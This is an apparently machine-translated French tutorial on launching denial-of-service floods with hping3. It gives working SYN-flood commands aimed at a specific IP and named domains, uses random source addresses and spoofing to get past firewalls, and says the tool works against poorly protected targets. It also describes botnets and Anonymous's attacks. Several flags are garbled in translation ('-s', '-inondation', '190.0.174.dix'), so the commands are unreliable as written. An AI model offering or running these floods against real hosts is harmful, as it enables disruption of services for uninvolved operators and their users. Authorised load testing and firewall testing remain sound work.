DOS inondation de hping3

DOS inondation de hping3
Ce tutoriel explique comment exécuter des attaques DDOS (déni de service distribué) à l'aide de l'outil Hping3.

Après avoir lu cet article, vous pourrez installer Hping3 pour exécuter les tests DOS et DDOS. À l'exception du processus d'installation basé sur Debian, le reste de ce document est valable pour toutes les distributions Linux.

Dans le cas où vous n'êtes pas familier avec les attaques DOS et DDOS, vous voudrez peut-être commencer par lire une introduction DOS et DDOS.

Toutes les étapes décrites ci-dessous incluent des captures d'écran pour permettre à chaque utilisateur de Linux de les suivre facilement.

À propos de Hping3

L'outil Hping3 vous permet d'envoyer des paquets manipulés, y compris la taille, la quantité et la fragmentation des paquets afin de surcharger la cible et de contourner ou d'attaquer les pare-feu. Hping3 peut être utile à des fins de sécurité ou de capacité de capacité. En l'utilisant, vous pouvez tester l'efficacité des pare-feu et si un serveur peut gérer une grande quantité de connexions. Vous trouverez ci-dessous des instructions sur la façon d'utiliser Hping3 à des fins de test de sécurité.

Début avec hping3

Pour installer Hping3 sur Debian et ses distributions Linux basées, y compris Ubuntu, utilisez le gestionnaire de packages APT comme indiqué dans la capture d'écran ci-dessous.

sudo apt install hping3 -y

Sur les distributions Linux basées sur CentOS ou Redhat, vous pouvez installer Hping3 en utilisant yum comme indiqué ci-dessous.

sudo yum -y install hping3

Une simple attaque DOS (pas DDOS) serait:

sudo hping3 -s --flood -v -p 80 170.155.9.185

Où:

  • Sudo: donne les privilèges nécessaires pour exécuter hping3.
  • hping3: appelle le programme Hping3.
  • -S: Spécifie les paquets syn.
  • -inondation: les réponses seront ignorées et les paquets seront envoyés le plus rapidement possible.
  • -V: Verbosité.
  • -p 80: Port 80, vous pouvez remplacer ce numéro pour le service que vous souhaitez attaquer.
  • 170.155.9.185: IP cibler.

Notez que la sortie ne montre pas de réponses car elles ont été ignorées.

Inondation à l'aide de paquets syn contre le port 80

Les paquets SYN incluent la demande de confirmation de synchronisation de la connexion.

L'exemple suivant montre une attaque syn contre Lacampora.org:

sudo hping3 lacampora.org -q -n -d 120 -s -p 80 --flood - rand-source

Où:

  • lacampora.org: est la cible, cette fois définie avec un nom de domaine.
  • -q: brève sortie
  • -n: Affiche une IP cible au lieu de l'hôte.
  • -D 120: Définit la taille du paquet
  • -rand-source: masque l'adresse IP.

L'exemple suivant montre un autre test Syn Flood possible pour le port 80.

Sudo Hping3 - Rand-source Ivan.com -s -q -p 80 --flood

Inondation d'une fausse adresse IP avec hping3

Avec Hping3, vous pouvez également attaquer vos cibles avec une fausse IP. Afin de contourner un pare-feu, vous pouvez même cloner votre IP cible elle-même, ou toute adresse autorisée que vous pouvez connaître (vous pouvez l'atteindre par exemple avec NMAP ou un renifleur pour écouter les connexions établies).

La syntaxe est la suivante:

sudo hping3 -a -S -Q -P 80

Dans l'exemple ci-dessous, j'ai remplacé ma véritable adresse IP par l'IP 190.0.174.dix.

sudo hping3 -a 190.0.174.10 190.0.175.100 -S -Q -P 80

Attaques DOS et DDOS

Une attaque de déni de service (DOS) est une technique très simple pour nier l'accessibilité aux services (c'est pourquoi il est appelé une attaque de «déni de service»). Cette attaque consiste à surcharger la cible avec des paquets surdimensionnés, ou une grande quantité d'entre eux.

Bien que cette attaque soit très facile à exécuter, elle ne compromet pas les informations ou la confidentialité de la cible. Ce n'est pas une attaque pénétrante et vise uniquement à empêcher l'accès à la cible.

En envoyant une quantité de paquets, la cible ne peut pas gérer les attaquants empêchant le serveur de servir les utilisateurs légitimes.

Les attaques DOS sont effectuées à partir d'un seul appareil; Par conséquent, il est facile de les arrêter en bloquant l'IP de l'attaquant. Pourtant, l'attaquant peut changer et même parcourir (clone) l'adresse IP cible. Mais il n'est pas difficile pour les pare-feu de faire face à de telles attaques, contrairement à ce qui se passe avec les attaques DDOS.

Un déni de service distribué (DDOS) est similaire à une attaque DOS mais réalisé à partir de différents nœuds (ou différents attaquants). Les attaques DDOS sont réalisées par des botnets. Les botnets sont des scripts ou des programmes automatisés qui infectent les ordinateurs pour effectuer une tâche automatisée (dans ce cas, une attaque DDOS). Un pirate peut créer un botnet et infecter de nombreux ordinateurs à partir desquels les botnets lanceront des attaques DOS. Le fait que de nombreux botnets tirent simultanément transforment l'attaque DOS en une attaque DDOS (c'est pourquoi elle s'appelle «distribuée»).

Bien sûr, il y a des exceptions dans lesquelles des attaques DDOS ont été menées par de vrais attaquants humains. Par exemple, le groupe de pirates Anonymous, intégré par des milliers de personnes dans le monde, a utilisé cette technique très fréquemment en raison de sa mise en œuvre facile (elle ne nécessitait que des bénévoles qui partageaient leur cause). C'est ainsi que l'anonyme a quitté le gouvernement libyen de Kadhafi complètement déconnecté pendant l'invasion. L'État libyen a été laissé sans défense avant des milliers d'attaquants de Worldwide.

Ce type d'attaques, lorsqu'il est effectué à partir de nombreux nœuds différents, est extrêmement difficile à prévenir et à arrêter. Il nécessite normalement du matériel spécial pour gérer. En effet. Ce n'est pas le cas de Hping3. La plupart des attaques effectuées via cet outil seront bloquées par des appareils défensifs ou des logiciels, mais il est utile dans les réseaux locaux ou contre des cibles mal protégées.

Vous pouvez maintenant commencer à lancer des attaques de test DOS et DDOS avec Hping3.

Conclusion

Comme vous pouvez le voir, l'exécution des attaques de déluge DOS est assez simple. La simplicité de ces attaques est un exemple formidable des internautes de danger et des utilisateurs spécialement corporatifs sont exposés (ce type d'attaques n'est pas habituel contre les utilisateurs domestiques).

Dans certains cas, les attaques DDOS peuvent être fatales pour les entreprises et extrêmement difficiles à arrêter.

Certains appareils matériels ont des mécanismes pour traiter les DDO, mais les techniques d'attaque s'améliorent, surtout lorsque de nombreux attaquants sont impliqués. Gardez à l'esprit que votre propre connexion peut être surchargée en exécutant les commandes décrites dans cet article.